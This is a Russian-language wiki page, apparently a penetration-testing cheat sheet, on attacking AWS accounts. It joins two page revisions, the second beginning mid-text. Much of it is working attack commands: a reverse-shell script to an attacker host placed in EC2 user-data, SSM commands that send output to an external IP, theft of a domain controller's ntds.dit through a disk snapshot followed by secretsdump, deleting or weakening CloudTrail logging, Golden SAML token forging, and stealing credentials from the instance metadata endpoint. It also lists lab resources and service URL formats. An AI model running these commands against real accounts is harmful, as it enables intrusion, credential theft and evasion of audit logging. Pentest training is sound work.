aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1

# Проверяем запустился ли инстанс
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1

# Не обязательно - редактируем группу инстанса
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1

# В конце работы - останавливаем и удаляем инстанс
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
</syntaxhighlight>

==== ec2-instance-connect:SendSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds</syntaxhighlight>

==== ec2-instance-connect:SendSerialConsoleSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

В отличие от предыдущего пункта, этот ключ можно использовать только при подключении EC2 Serial Console.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-serial-console-ssh-public-key --instance-id i-001234a4bf70dec41EXAMPLE --serial-port 0 --ssh-public-key file://my_key.pub --region us-east-1

# Подключаемся (кроме GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-east-1.aws
# Подключаемся (только для GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-gov-east-1.amazonaws.com

# В некоторых случаях нужно подключиться к EC2 и перезагрузить сервис getty (лучше пробовать только, когда не смогли подключиться)
sudo systemctl restart serial-getty@ttyS0
# Если не сработало - мб требуется ребутать сервер.
</syntaxhighlight>

Также можно подключиться, используя браузер. Подробнее тут: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/connect-to-serial-console.html

==== ssm:SendCommand ====

Позволяет запускать команды в EC2-Instances. Если нет дополнительных прав, то потребуется:

* Знать Instance-ID, на котором запущен сервис SSM

* Свой сервер, на который будет приходить отстук - результат команды.

Команды для эксплуатации:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию о SSM сервисах - может потребоваться ssm:DescribeInstanceInformation
aws ssm describe-instance-information --profile stolencreds --region eu-west-1
# Выполняем команду
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
# Получаем результат команды(может не хватить прав ssm:ListCommandInvocations)
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds

# Пример - результат команды на удаленный сервер
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
</syntaxhighlight>

==== EC2:CreateSnapshot + Active Directory ====

См. AD.

== Auto Scaling (autoscaling) ==

Сервис для масштабирования приложений. Работает преимущественно с EC2, ECS, DynamoDB (таблицы и индексы) и Aurora.

Для работы сервиса требуется:

1. Конфигурация запуска EC2.

2. Конфигурация масштабирования.

== Роли - повышение привилегий ==

=== autoscaling:CreateLaunchConfiguration + autoscaling:Create(Update)AutoScalingGroup + iam:PassRole ===

Позволяет создать и запустить конфигурацию масштабирования.

==== Создаем конфигурацию запуска EC2 ====

Для создания требуется:

1. Image-id

2. iam-instance-profile

Следующая команда создает конфигурацию с командой из файла reverse-shell.sh:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-launch-configuration --launch-configuration-name demo3-LC --image-id ami-0f90b6b11936e1083 --instance-type t1.micro --iam-instance-profile demo-EC2Admin --metadata-options "HttpEndpoint=enabled,HttpTokens=optional" --associate-public-ip-address --user-data=file://reverse-shell.sh
</syntaxhighlight>

Пример содержимого reverse-shell.sh:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
#!/bin/bash
/bin/bash -l > /dev/tcp/atk.attacker.xyz/443 0<&1 2>&1
</syntaxhighlight>

==== Создаем и запускаем группу масштабируемости ====

Привилегия ec2:DescribeSubnets нужна для выбора нужной сети (чтобы EC2 смог сделать reverse-соедиенение к нам).

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-auto-scaling-group --auto-scaling-group-name demo3-ASG --launch-configuration-name demo3-LC --min-size 1 --max-size 1 --vpc-zone-identifier "subnet-aaaabbb"
</syntaxhighlight>

Подробнее тут https://notdodo.medium.com/aws-ec2-auto-scaling-privilege-escalation-d518f8e7f91b

== AD (Directory Service) ==

Второе название - AWS Managed Microsoft Active Directory. Позволяет использовать Active Directory в AWS.

Основные понятия:

* EC2-Instance - VPS на которых крутится весь Active Directory

=== Роли - повышение привилегий ===

==== EC2:CreateSnapshot + EC2:RunInstance -> ShadowCopy ====

Позволяет провести атаку ShadowCopy на доменный контроллер и считать учетные данные всех пользователей.

Последовательность атаки:

1. Получаем список инстансов

2. Создаем Snapshot выбранного сервера

3. Редактируем атрибуты у SnapShot для доступа с аккаунта атакующего.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 modify-snapshot-attribute --snapshot-id snap-1234567890abcdef0 --attribute createVolumePermission --operation-type remove --user-ids 123456789012
</syntaxhighlight>

4. Переключаемся на аккаунт атакующего

5. Создаем новый Linux EC2-инстанс, к которому будет прикреплен SnapShot

6. Подключаемся по SSH и получаем данные из SnapShot
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sudo -s
mkdir /tmp/windows
mount /dev/xvdf1 /tmp/windows/
cd /tmp/windows/
</syntaxhighlight>

7. Работаем с данными на примонтированном диске, который будет в /tmp/windows/. Пример команд для извлечения ntds.dit:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
cp /windows/Windows/NTDS/ntds.dit /home/ec2-user
cp /windows/Windows/System32/config/SYSTEM /home/ec2-user
chown ec2-user:ec2-user /home/ec2-user/*
# Sftp - скачиваем файлы:
/home/ec2-user/SYSTEM
/home/ec2-user/ntds.dit
# Получаем учетные данные, используя Impacket-secretsdump
secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets
</syntaxhighlight>

== CloudTrail ==

Сервис для аудита событий в AWS-аккаунте (включен в каждом аккаунте по-умолчанию). Сервис позволяет вести журналы, осуществлять непрерывный мониторинг и сохранять информацию об истории аккаунта в пределах всей используемой инфраструктуры AWS.

Записывает:

* API-вызовы

* Логины в систему

* События сервисов

* ???

Важен при операциях RedTeam.

Название файла логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
AccountID_CloudTrail_RegionName_YYYYMMDDTHHmmZ_UniqueString.FileNameFormat
</syntaxhighlight>

S3 путь до логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
BucketName/prefix/AWSLogs/AccountID/CloudTrail/RegionName/YYYY/MM/DD
</syntaxhighlight>

Путь у CloudTrail-Digest файлов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
s3://s3-bucket-name/optional-prefix/AWSLogs/aws-account-id/CloudTrail-Digest/region/digest-end-year/digest-end-month/digest-end-data/aws-account-id_CloudTrail-Digest_region_trail-name_region_digest_end_timestamp.json.gz
</syntaxhighlight>

Основные поля у событий:

* eventName - имя API-endpoint

* eventSource - вызванный сервис

* eventTime - время события

* SourceIPAddress - ip-адрес источника

* userAgent - метод запроса
** "signing.amazonaws.com" - запрос от AWS Management Console
** "console.amazonaws.com" - запрос от root-пользователя аккаунта
** "lambda.amazonaws.com" - запрос от AWS Lambda

* requestParameters - параметры запроса

* responseElements - элементы ответа.

Временные параметры:

* 5 минут - сохраняется новый лог-файл

* 15 минут - сохраняется в S3.

Важно! Сохраняется чексумма файлов, поэтому пользователи могут удостовериться что логи не менялись.
Также логи могут уходить напрямую в CloudWatch - администраторам может прилететь уведомление об ИБ-инцидентах. Или события могут быть проанализированы внутренним модулем CloudTrail - Insights на предмет необычной активности.

=== Роли - управление ===

==== cloudtrail:DeleteTrail ====

Позволяет отключить мониторинг:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
</syntaxhighlight>

==== cloudtrail:UpdateTrail ====

Права на редактирование правил монитринга.

Отключить мониторинг глобальных сервисов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event
</syntaxhighlight>

Отключить мониторинг на конкретные регионы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
</syntaxhighlight>

==== validate-logs ====

Проверить, были ли изменены логи.

aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]

=== Эксплуатация ===

==== Обход правила по UserAgent ====

На сервисе есть правило, по которому определяет, что запросы были сделаны с kali/parrot/pentoo используя awscli.

Для этого можно воспользоваться утилитой pacu, которая автоматически подменяет useragent. Использование утилиты в конце статьи.

== DynamoDB ==

Cистема управления базами данных класса NoSQL в формате «ключ — значение».

=== Роли - управление ===

==== dynamodb:ListTables ====

Позволяет посмотреть спрсок таблиц базы данных.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables

{
"TableNames": [
"users"
]
}
</syntaxhighlight>

==== dynamodb:Scan ====

Получение обьектов из базы данных:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]'

{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
}
</syntaxhighlight>

== ES (ElasticSearch) ==

ElasticSearch от AWS. Используется для просмотра логов/журналов, поиска на вебсайте и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.es.amazonaws.com
</syntaxhighlight>

== ELB (Elastic Load Balancing) ==

Балансировщик нагрузки.

Формат ссылки (elb_v1):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
</syntaxhighlight>

Формат ссылки (elb_v2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
</syntaxhighlight>

== RDS (Relational Database Service) ==

Облачная реляционная база данных (на выбор).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306
postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432
</syntaxhighlight>

== Route 53 ==

Настраиваемая служба DNS.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
{user_provided}
</syntaxhighlight>

== API Gateway ==

API-сервис, который будет доступен почти со всех серверов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{restapi_id}.execute-api.{region}.amazonaws.com/{stage_name}/
https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided}
</syntaxhighlight>

== CloudSearch ==

Альтернатива сервису ElasticSearch. Система для упрощения поиска для администрирования и, например, на вебсайте.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com
</syntaxhighlight>

== Transfer Family ==

Группа сервисов для передачи файлов (S3/EFS) по (SFTP, FTPS, FTP).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sftp://s-{random_id}.server.transfer.{region}.amazonaws.com
ftps://s-{random_id}.server.transfer.{region}.amazonaws.com
ftp://s-{random_id}.server.transfer.{region}.amazonaws.com
</syntaxhighlight>

== IoT (Internet Of Things) ==

Сервис для управления IoT-устройствами.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mqtt://{random_id}.iot.{region}.amazonaws.com:8883
https://{random_id}.iot.{region}.amazonaws.com:8443
https://{random_id}.iot.{region}.amazonaws.com:443
</syntaxhighlight>

== MQ ==

Сервис брокера сообщений для Apache ActiveMQ & RabbitMQ.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162
ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
</syntaxhighlight>

== MSK (Managed Streaming for Apache Kafka) ==

Сервис потоковой передачи данных в Apache Kafka.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
</syntaxhighlight>

== Cloud9 ==

Облачная интегрированная среда разработки(IDE) используя только браузер.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.vfs.cloud9.{region}.amazonaws.com
</syntaxhighlight>

== MediaStore ==

Cервис хранилища AWS, оптимизированный для мультимедийных материалов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.data.mediastore.{region}.amazonaws.com
</syntaxhighlight>

== Kinesis Video Streams ==

Обеспечивает простую и безопасную потоковую передачу видео с подключенных устройств в AWS для воспроизведения, аналитики, машинного обучения (ML) и других видов обработки.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.kinesisvideo.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaConvert ==

Сервис перекодирования видеофайлов с возможностями на уровне вещательных компаний. Он позволяет просто создавать контент в формате «видео по требованию» (VOD) для трансляций, в том числе мультиэкранных, в любом масштабе.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediaconvert.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaPackage ==

Cервис для подготовки и защиты видеоконтента, распространяемого через Интернет. AWS Elemental MediaPackage использует один источник видео и создает на его основе специализированные видеопотоки для воспроизведения на подключенных телевизорах, мобильных телефонах, компьютерах, планшетах и игровых консолях.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
</syntaxhighlight>

== ECR (Elastic Container Registry) ==

Региональный сервис, предназначенный для обеспечения гибкого развертывания образов.

=== Роли - управление ===

==== ecr:ListImages ====

Получить список образов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr list-images --repository-name <ECR_name> --registry-id <UserID> --region <region> --profile <profile_name>
</syntaxhighlight>

==== ecr:GetDownloadUrlForLayer ====

Позволяет получить URL на скачивание образа.

==== ecr:GetDownloadUrlForLayer + ecr:BatchGetImage + ecr:GetAuthorizationToken ====

Позволяет скачать образ (мб потребуется и ecr:ListImages чтобы получить список образов):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr get-login
docker pull <UserID>.dkr.ecr.us-east-1.amazonaws.com/<ECRName>:latest
docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
</syntaxhighlight>

== Augmented AI (Amazon A2I) ==

https://aws.amazon.com/ru/augmented-ai/

== CodeGuru ==

https://aws.amazon.com/ru/codeguru/

== Comprehend ==

https://aws.amazon.com/ru/comprehend/

== DevOps Guru ==

https://aws.amazon.com/ru/devops-guru/

== Elastic Inference ==

https://aws.amazon.com/machine-learning/elastic-inference/

== Forecast ==

https://aws.amazon.com/ru/forecast/

== Fraud Detector ==

https://aws.amazon.com/ru/fraud-detector/

== HealthLake ==

https://aws.amazon.com/healthlake/

== Kendra ==

https://aws.amazon.com/kendra/?did=ap_card&trk=ap_card

== Lex ==

https://aws.amazon.com/lex/?did=ap_card&trk=ap_card

== Lookout for Equipment ==

https://aws.amazon.com/ru/lookout-for-equipment/

== Lookout for Metrics ==

https://aws.amazon.com/lookout-for-metrics/

== Lookout for Vision ==

https://aws.amazon.com/lookout-for-vision/

== Monitron ==

https://aws.amazon.com/monitron/

== Personalize ==

https://aws.amazon.com/personalize/

== Polly ==

https://aws.amazon.com/polly/

== Rekognition ==

https://aws.amazon.com/rekognition/

== SageMaker ==

https://aws.amazon.com/sagemaker/

== SageMaker Ground Truth ==

https://aws.amazon.com/sagemaker/groundtruth/

== Textract ==

https://aws.amazon.com/textract/

== Transcribe ==

https://aws.amazon.com/transcribe/

== Translate ==

https://aws.amazon.com/translate/

== Apache MXNet ==

https://aws.amazon.com/ru/mxnet/

== Deep Learning Containers ==

https://aws.amazon.com/machine-learning/containers/

== DeepComposer ==

https://aws.amazon.com/deepcomposer/

== DeepLens ==

https://aws.amazon.com/deeplens/

== DeepRacer ==

https://aws.amazon.com/deepracer/

== Inferentia ==

https://aws.amazon.com/machine-learning/inferentia/

== Panorama ==

https://aws.amazon.com/panorama/

== PyTorch ==

https://aws.amazon.com/pytorch/

== TensorFlow ==

https://aws.amazon.com/tensorflow/

== Deep Learning AMI ==

https://aws.amazon.com/machine-learning/amis/

= Утилиты =

== Вычисление ролей ==

=== enumerate-iam ===
github.com:andresriancho/enumerate-iam.git

== Эксплуатация ==

=== Golden SAML ===

Суть атаки в том, что зная ключ, которым подписываются SAML-запросы, вы можете подделать ответ и получить произвольные привилегии в SSO.

Подробнее про эксплуатацию тут: https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps

==== shimit ====
https://github.com/cyberark/shimit

Установка:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
cd /tmp
python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
git clone https://github.com/cyberark/shimit
cd shmit
python shmit.py
</syntaxhighlight>

В начале потребуется доступ к AD FS аккаунту из персонального хранилища которого украсть приватный ключ ключ.
Сделать это можно используя mimikatz, но в примере сделано через библиотеку Microsoft.Adfs.Powershell и powershell

Пример эксплуатации:
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:auto" >
# Получаем приватный ключ
[System.Convert]::ToBase64String($cer.rawdata)
(Get-ADFSProperties).Identifier.AbsoluteUri
(Get-ADFSRelyingPartyTrust).IssuanceTransformRule

# Получаем инфу о юзерах - выбираем цель
aws iam list-users

# Получаем токен
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

# Проверяем текущий аккаунт
aws opsworks describe-my-user-profile
</syntaxhighlight>

== Проверки безопасности ==

Для администраторов преимущественно.

=== Zeus ===

https://github.com/DenizParlak/Zeus

== Другое ==

=== aws_consoler ===

https://github.com/NetSPI/aws_consoler

== All-In-One ==

=== pacu ===

https://github.com/RhinoSecurityLabs/pacu

=== ScoutSuite ===

https://github.com/nccgroup/ScoutSuite

=== cloudfox ===

https://github.com/BishopFox/cloudfox

= Ссылки =

== Статьи ==

[https://frichetten.com/blog/hijack-iam-roles-and-avoid-detection/ Hijacking IAM Roles and Avoiding Detection]

[https://frichetten.com/blog/bypass-guardduty-pentest-alerts/ Bypass GuardDuty PenTest Alerts]

[https://frichetten.com/blog/ssm-agent-tomfoolery/ Intercept SSM Agent Communications]

== Лаборатории ==

[https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6 Damn Vulnerable Cloud Application]

[https://github.com/nccgroup/sadcloud SadCloud]

[http://flaws.cloud Flaws]

[http://flaws2.cloud/ Flaws]

[https://xakep.ru/2022/03/21/htb-stacked/ HackTheBox Stacked Writeup]

[https://github.com/RhinoSecurityLabs/cloudgoat CloudGoat]

[https://github.com/nccgroup/sadcloud SadCloud]

[https://www.wellarchitectedlabs.com/security/ AWS Well-Architected Labs]

[https://labs.withsecure.com/publications/attack-detection-fundamentals-2021-aws-lab-1 Attack Detection Fundamentals 2021: AWS - Lab #1]

[https://pentesting.cloud/ Free AWS Security Labs]

== Краткие заметки ==

[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md PayloadAllTheThings]

[https://book.hacktricks.xyz/pentesting/pentesting-web/buckets/aws-s3 hacktricks-s3]

[https://book.hacktricks.xyz/cloud-security/aws-security hacktricks-aws]

[https://learntocloud.guide/#/phase5/README learntocloud(много ссылок)]

== Книги ==

[https://www.amazon.com/dp/1789136725/ Hands-On AWS Penetration Testing with Kali Linux]

Aws

2022-10-12T21:01:16Z

Drakylar: /* Роли - повышение до админа */

AWS - Amazon Web Service. Одна из первых облачных систем, состоящая из многих сервисов, которые при некорректной настройке оставляют дыры в безопасности.

= Организационные моменты =

При проведении тестирования на проникновение, требуется предупредить AWS (составить заявку).

Подробнее тут: https://aws.amazon.com/ru/security/penetration-testing/

= Общие концепции =

== Службы ==

Концепция служб в AWS позволяет автоматизировать многие процессы, включая саму разработку архитектуры.

Это экосистема многих сервисов. И AWS стремится увеличить их количество.

Например, связать сервис сбора логов и сервис по реагированию на инциденты, а результаты класть на сервис S3.

== Регионы ==

AWS разделен на регионы. Часть сервисов кросс-региональные, но большинство привязываются к конкретным регионам.

{| class="wikitable"
|+Регионы AWS
|-
| '''Название региона'''
| '''Endpoint(HTTPS)'''
|-
|us-east-2
|rds.us-east-2.amazonaws.com

rds-fips.us-east-2.api.aws

rds.us-east-2.api.aws

rds-fips.us-east-2.amazonaws.com
|-
|us-east-1
|rds.us-east-1.amazonaws.com

rds-fips.us-east-1.api.aws

rds-fips.us-east-1.amazonaws.com

rds.us-east-1.api.aws
|-
|us-west-1
|rds.us-west-1.amazonaws.com

rds.us-west-1.api.aws

rds-fips.us-west-1.amazonaws.com

rds-fips.us-west-1.api.aws
|-
|us-west-2
|rds.us-west-2.amazonaws.com

rds-fips.us-west-2.amazonaws.com

rds.us-west-2.api.aws

rds-fips.us-west-2.api.aws
|-
|af-south-1
|rds.af-south-1.amazonaws.com

rds.af-south-1.api.aws
|-
|ap-east-1
|rds.ap-east-1.amazonaws.com

rds.ap-east-1.api.aws
|-
|ap-southeast-3
|rds.ap-southeast-3.amazonaws.com
|-
|ap-south-1
|rds.ap-south-1.amazonaws.com

rds.ap-south-1.api.aws
|-
|ap-northeast-3
|rds.ap-northeast-3.amazonaws.com

rds.ap-northeast-3.api.aws
|-
|ap-northeast-2
|rds.ap-northeast-2.amazonaws.com

rds.ap-northeast-2.api.aws
|-
|ap-southeast-1
|rds.ap-southeast-1.amazonaws.com

rds.ap-southeast-1.api.aws
|-
|ap-southeast-2
|rds.ap-southeast-2.amazonaws.com

rds.ap-southeast-2.api.aws
|-
|ap-northeast-1
|rds.ap-northeast-1.amazonaws.com

rds.ap-northeast-1.api.aws
|-
|ca-central-1
|rds.ca-central-1.amazonaws.com

rds.ca-central-1.api.aws

rds-fips.ca-central-1.api.aws

rds-fips.ca-central-1.amazonaws.com
|-
|eu-central-1
|rds.eu-central-1.amazonaws.com

rds.eu-central-1.api.aws
|-
|eu-west-1
|rds.eu-west-1.amazonaws.com

rds.eu-west-1.api.aws
|-
|eu-west-2
|rds.eu-west-2.amazonaws.com

rds.eu-west-2.api.aws
|-
|eu-south-1
|rds.eu-south-1.amazonaws.com

rds.eu-south-1.api.aws
|-
|eu-west-3
|rds.eu-west-3.amazonaws.com

rds.eu-west-3.api.aws
|-
|eu-north-1
|rds.eu-north-1.amazonaws.com

rds.eu-north-1.api.aws
|-
|me-south-1
|rds.me-south-1.amazonaws.com

rds.me-south-1.api.aws
|-
|sa-east-1
|rds.sa-east-1.amazonaws.com

rds.sa-east-1.api.aws
|-
|us-gov-east-1
|rds.us-gov-east-1.amazonaws.com
|-
|us-gov-west-1
|rds.us-gov-west-1.amazonaws.com
|}

Или только регионы (могут пригодиться при переборе):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
us-east-2
us-east-1
us-west-1
us-west-2
af-south-1
ap-east-1
ap-southeast-3
ap-south-1
ap-northeast-3
ap-northeast-2
ap-southeast-1
ap-southeast-2
ap-northeast-1
ca-central-1
eu-central-1
eu-west-1
eu-west-2
eu-south-1
eu-west-3
eu-north-1
me-south-1
sa-east-1
us-gov-east-1
us-gov-west-1
</syntaxhighlight>

== Доступы ==

== Консольная утилита(awscli) ==

Чаще всего для взаимодействия с сервисами AWS вам потребуется консольная утилита awscli.

Утилита работает с настроенными профилями.

=== Файлы ===

==== ~/.aws/credentials ====

Файл с учетными данными профилей. Перефразирую: получив данные из этого файла вы, вероятнее всего, получите контроль над аккаунтами в нем.

У каждого профиля будет указан:

* Access Key ID - 20 случайных букв/цифр в верхнем регистре, часто начинается с "AKIA..."

* Access Key - 40 случайных символов различного регистра.

* Access Token - не всегда указывается

Полный список параметров можно посмотреть тут: https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-files.html#cli-configure-files-settings

Пример содержимого файла (сохранен профиль default):

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token = AQoEXAMPLEH4aoAH0gNCAPyJxz4BlCFFxWNE1OPTgk5TthT+FvwqnKwRcOIfrRh3c/LTo6UDdyJwOOvEVPvLXCrrrUtdnniCEXAMPLE/IvU1dYUg2RVAJBanLiHb4IgRmpRV3zrkuWJOgQs8IZZaIv2BXIa2R4Olgk
</syntaxhighlight>

==== ~/.aws/config ====

Файл с региональными настройками профиля(регион по-умолчанию).
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
region=us-west-2
output=json
</syntaxhighlight>

==== ~/.aws/cli/cache ====

Закешированные учетные данные

==== ~/.aws/sso/cache ====

Закешированные данные Single-Sign-On

=== Команды ===

Общее построение команды выглядит как:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws <название_сервиса> <действие> <дополнительные_аргументы>
</syntaxhighlight>

Примеры:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Вывести все S3-хранилища.
aws s3 ls

# Создание нового пользователя - сервис IAM
aws iam create-user --user-name aws-admin2
</syntaxhighlight>

== IMDS (Instance Metadata Service) ==

Это http API для запросов из EC2. Полезно если, например, у вас есть уязвимость SSRF в EC2.

Есть 2 версии:

*IMDSv1 - версия 1 по-умолчанию, не требует токен.

*IMDSv2 - версия 2, для запросов требуется токен.

Запрос без токена:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
curl http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Запрос с токеном:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Кроме доп. информации можно получить access-token для доступа в AWS с сервисного аккаунта ec2 (только для IMDSv2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# В начале делаем запрос на директорию /security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Потом выбираем нужный аккаунт и делаем запрос на него
http://169.254.169.254/latest/meta-data/iam/security-credentials/test-account
</syntaxhighlight>

Пример ответа:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Code" : "Success",
"LastUpdated" : "2019-12-03T07:15:34Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "xxxxxxxxxxxxxxxxxxx",
"SecretAccessKey" : "xxxxxxxxxxxxxxxxxxxxx",
"Token" : "xxxxxxxxxxxxxxxxxxxxx",
"Expiration" : "2019-12-03T13:50:22Z"
}
</syntaxhighlight>
После чего эти учетные данные можно использовать с awscli.

Другие полезные Endpoint'ы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://169.254.169.254/
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
